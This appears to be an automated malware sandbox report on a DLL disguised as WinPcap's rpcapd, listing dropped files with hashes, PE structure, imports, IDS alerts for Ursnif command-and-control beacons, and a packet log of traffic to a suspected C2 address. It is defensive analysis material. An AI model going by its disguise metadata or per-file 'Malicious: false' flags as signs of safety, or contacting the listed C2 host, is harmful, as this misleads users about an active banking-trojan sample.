SHA-256: | 2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD |
SHA-512: | 94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 377 |
Entropy (8bit): | 5.245551465598388 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fQ+b0zxs7+AEszIcNwi23fQ+CWH:p37Lvkmb6KwZ4+wWZEJZ4+VH |
MD5: | 657DF5DBF2CD40C8427224A737044E8C |
SHA1: | 9BB8F1884A4BF325B5E07D3874D7CB7CD163A047 |
SHA-256: | 47A5E44ED29C7B102C323480B9BFB1992012E17C84BD7C5A601E3AADC9690BCA |
SHA-512: | 60404977E8335B653914ADE5B6B9506714E2855F31A4F9E046898D7A66480CAC4631D851061911B309E6AFBF0EBFA8539D1417E00861D8F25C21AF6AF6E4FDFF |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.643829505456859 |
Encrypted: | false |
SSDEEP: | 24:etGSDeMWWOJy853Ek0s2E7Og1odWQzbtkZfdFwT/OWI+ycuZhNUsvakSfsIPNnq:6svz5UkGE7vsWQzqJ/a11ul/a3jq |
MD5: | 010A7FEF0AA253BE01A7D57105104C99 |
SHA1: | EC3146FF9E8A4218C2D14CE70863692B953A751E |
SHA-256: | B291831CDE532E047D0BBDB58CEFA9AAF938BEFE3F2FDF3762F7F7387A134DD5 |
SHA-512: | C5B8B280D4D696424FBB02582992513EFA5186E4DCBABB2E2057439178330A8857A0DF3172F054FC8CB94966182FAFA6F813A979871E3A8E44FB21350D4268D5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 874 |
Entropy (8bit): | 5.323639412262709 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KgvEvbOKaM5DqBVKVrdFAMBJTH:Akka67vEvCKxDcVKdBJj |
MD5: | 77A926519D8FA89DF6F5D0C77E79D0A3 |
SHA1: | 7912DA6B9435D7AF26FA649341CB5E0124EA8FC3 |
SHA-256: | 452BD2C2631FDB744B80E6DD5A033C45548FE8733869C2F9F41110A529F1F9B0 |
SHA-512: | 40D9D3C5443AD37475C6F9A3B5E1E4C784B44AA664DE62EA10A0B6011657DFF2A2AA5B9846B58B1A75277E747406A42BB7DDCD99A67ECB23FDB82D1CBB225BBA |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1048977846809547 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryMbak7Ynqq/UPN5Dlq5J:+RI+ycuZhNwakScPNnqX |
MD5: | E2051F8A521B2F3B00C715BD57DCCC78 |
SHA1: | 667FC3B5ED67494166B61D57050519DA3C24C9EC |
SHA-256: | 9FC45C88A9D75B6A1856480057CACF18B668C8C61992A417C1FB48EB0C4381F1 |
SHA-512: | 9C0585D9186601C0497179607893F845DABBFFFB8BE8453162BD9435CB1F6F9030CE01F1A16ADE1E79FBC01DF4B16CD3913EB4A39DA0F391CC0B06D92A8A1F89 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 411 |
Entropy (8bit): | 5.082169696837192 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy |
MD5: | 248E15CD19191D4333303E0E1F8E9A70 |
SHA1: | 9896EF9708F81AE4E3F2CA86329AD6BD82C700C3 |
SHA-256: | 0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF |
SHA-512: | 8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 377 |
Entropy (8bit): | 5.2338402577992165 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fDSZ++zxs7+AEszIcNwi23fDSZE:p37Lvkmb6KwZLYWZEJZLV |
MD5: | 23922C7400B5639004534C21A8FC6FD9 |
SHA1: | EFC910B97F452FB59BF063CB331136BF7B5EE364 |
SHA-256: | 65423661DBE57376B2BFEE4E014394645B6A2C67FC8C71C9F9196D586FBBAE09 |
SHA-512: | 557EF63D5E3B0D3228229F28E76BADE02AC8844BAE6AA0D67C987A459C1D9B7430283C6AAFD98B56701993112344740A7BF128ECD2FD9E061A0C54C968650AA1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6392294884325143 |
Encrypted: | false |
SSDEEP: | 24:etGSc8+mUE7R853RY0kCG++4I4tkZfcuDZ0WI+ycuZhNwakScPNnq:6GXE7S50/JcYZX1ulwa3Mq |
MD5: | DF0CED5409923E601543A19300A5F2C0 |
SHA1: | B5055B13C52F28A7AC23A4DC6F1BC7058B50EA16 |
SHA-256: | 95927D387C19566BAF533827449CDAF0EB132DF3DFF1F500ECCDDB1DAEC9313D |
SHA-512: | 4F64BBE5A0E84FF07B70A07DCF97C58BC444B42800C4479E33F8424E6A8C3DA137AEA4E3F62D1991CD86B452840BEFDBC49013949082295D131875AEC65A0455 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 874 |
Entropy (8bit): | 5.318135012806756 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KgLpEvLwKaM5DqBVKVrdFAMBJTH:Akka67FEvEKxDcVKdBJj |
MD5: | 1057CD175F0A0ED38ECEADB83BD825CC |
SHA1: | 1510C0179E5FC3A55FB866668781A6CF04B43611 |
SHA-256: | 2CC8FD12A44EEFECF8ED908C4EE2C450036626C87C13A238A7F560E1891A528C |
SHA-512: | 748F36E9A2484DC0413481447CB1325365F7DCE121E208AB2ED48ADF4282D18975FD66700E421AC6CEA98CD2A424AA71A3AADC956330DE4EC648356684B03435 |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220422\PowerShell_transcript.910646.1Eiln6hD.20220422152728.txt
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1371 |
Entropy (8bit): | 5.404148001284477 |
Encrypted: | false |
SSDEEP: | 24:BxSAGdZOvBdaQx2DOXUWZJ/t+LCHt4qW4HjeTKKjX4CIym1ZJX0J/t+LCHt4gnxf:BZ9v6QoOFht4t4qDYB1Zaht4eZZcC |
MD5: | 0B43799452C644E51F9DD4EF713574B6 |
SHA1: | 70329EFE7607D70C080CE16FE4CB78592B878CED |
SHA-256: | 134FFA52B0570D604C1799C9CBB7AD9F2CD2B4154DD6166D79176D53A8C4BD58 |
SHA-512: | 1829C6541D3DAD2E8BF85716238A6B4251AAC6166E1FE122B0E43643FAF772B03DE20C3B244F50EA102E2CBBF4C67B004E82C4F0421705521A499885FCF18E5D |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.10709348833746 |
TrID: |
|
File name: | HxEWwh74qT.dll |
File size: | 639303 |
MD5: | 5d2b5cbd8a574c9e35309e21ecf93a0e |
SHA1: | c15e583e28556f5d187197937b4d2a715ebf8ca7 |
SHA256: | 52d14c9cd56aa41ba98a24a4a3dc3674f7e281c3d79f6aca141382fb56585bcd |
SHA512: | e040b612277556aa5c4b669672f1ff4704bacab562a268c67bf80bdc4a861cdbc74f3a226b0a1d37f61db047228f8ee0b1acbe81accd19d38de28dbb0df94ddd |
SSDEEP: | 12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZR:+w1lEKOpuYxiwkkgjAN8ZR |
TLSH: | 3DD4BD1A029B2102EBB6CE78A751636C54174CE09B01E2CFC9190DA395E35FBF4FA5ED |
File Content Preview: | MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{....................... |
Icon Hash: | 74f0e4ecccdce0e4 |
Entrypoint: | 0x401023 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | fd1c62e6f93e304a27347077f6d2b44c |
Signature Valid: | |
Signature Issuer: | |
Signature Validation Error: | |
Error Number: | |
Not Before, Not After | |
Subject Chain | |
Version: | |
Thumbprint MD5: | |
Thumbprint SHA-1: | |
Thumbprint SHA-256: | |
Serial: |
Instruction |
---|
jmp 00007F5AD49CE36Dh |
jmp 00007F5AD49FEAD8h |
jmp 00007F5AD49CE053h |
jmp 00007F5AD49CDD0Eh |
jmp 00007F5AD49CE129h |
jmp 00007F5AD49CDB64h |
jmp 00007F5AD4A03F4Fh |
jmp 00007F5AD49CDC6Ah |
jmp 00007F5AD49F72C5h |
jmp 00007F5AD4A07180h |
jmp 00007F5AD4A02DEBh |
jmp 00007F5AD4A08346h |
jmp 00007F5AD49CDBE1h |
jmp 00007F5AD49F83FCh |
jmp 00007F5AD4A0AA17h |
jmp 00007F5AD4A01CC2h |
jmp 00007F5AD49F947Dh |
jmp 00007F5AD49CE098h |
jmp 00007F5AD4A0D9B3h |
jmp 00007F5AD49CDDBEh |
jmp 00007F5AD4A09579h |
jmp 00007F5AD49FFBA4h |
jmp 00007F5AD49FA48Fh |
jmp 00007F5AD4A0939Ah |
jmp 00007F5AD49CE035h |
jmp 00007F5AD4A04F70h |
jmp 00007F5AD49FC9CBh |
jmp 00007F5AD4A0CAD6h |
jmp 00007F5AD49FB891h |
jmp 00007F5AD49CE02Ch |
jmp 00007F5AD49CDBA7h |
jmp 00007F5AD4A060B2h |
jmp 00007F5AD4A0BA2Dh |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_VERSION | 0x98170 | 0x3d0 | data |
DLL | Import |
---|---|
WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification |
msvcrt.dll | toupper |
USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW |
OLEAUT32.dll | LHashValOfNameSysA |
SHELL32.dll | FindExecutableW |
KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA |
Secur32.dll | InitializeSecurityContextW |
ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner |
GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW |
Description | Data |
---|---|
LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino. |
InternalName | rpcapd |
FileVersion | 4.0.0.1040 |
CompanyName | CACE Technologies |
LegalTrademarks | |
ProductName | WinPcap |
ProductVersion | 4.0.0.1040 |
FileDescription | Remote Packet Capture Daemon |
Build Description | |
OriginalFilename | rpcapd.exe |
Translation | 0x0000 0x04b0 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/22/22-15:27:17.806871 04/22/22-15:27:17.806871 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
04/22/22-15:27:18.629540 04/22/22-15:27:18.629540 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
04/22/22-15:26:57.401743 04/22/22-15:26:57.401743 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49771 | 80 | 192.168.2.7 | 13.107.43.16 |
04/22/22-15:27:19.716505 04/22/22-15:27:19.716505 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 22, 2022 15:27:17.782037020 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:17.806235075 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:17.806369066 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:17.806870937 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:17.831151962 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.182925940 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.182971954 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.182987928 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.183068037 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.183109045 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.183115005 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.183139086 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.183161020 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.183202028 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.183307886 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.183341026 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.183377028 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.183378935 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.183398962 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.183419943 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.183427095 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.183465958 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.183490992 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.183500051 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.183516979 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.183559895 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.183581114 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.183641911 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.207326889 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.207511902 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.223510981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.223576069 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.223592997 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.223618031 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.223647118 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.223661900 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.223697901 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.223737001 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.223757029 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.223757982 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.223813057 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.223964930 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.223993063 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.224009037 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.224033117 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.224073887 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.224178076 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.224201918 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.224215984 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.224253893 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.224280119 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.224370003 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.224402905 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.224419117 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.224438906 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.224466085 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.231627941 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.231911898 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.264410019 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264482021 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264502048 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264524937 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264552116 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264569044 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264591932 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264600992 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.264616013 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264633894 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.264640093 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264659882 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264691114 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.264717102 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.264749050 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264791012 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264806032 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.264812946 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264852047 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.264866114 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.264915943 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.288505077 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.288824081 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.304106951 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304168940 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304188013 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304214001 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304250002 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304291010 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.304305077 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304341078 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304349899 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.304366112 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304387093 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304406881 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.304410934 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304435968 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304440975 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.304451942 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304461956 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.304483891 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.304522991 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304558039 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304577112 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.304589987 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304614067 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304615021 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.304640055 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304661989 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.304675102 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.304692984 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.312458038 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.312640905 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:18.344346046 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344400883 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344420910 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344455004 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344480038 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344496012 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:18.344515085 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
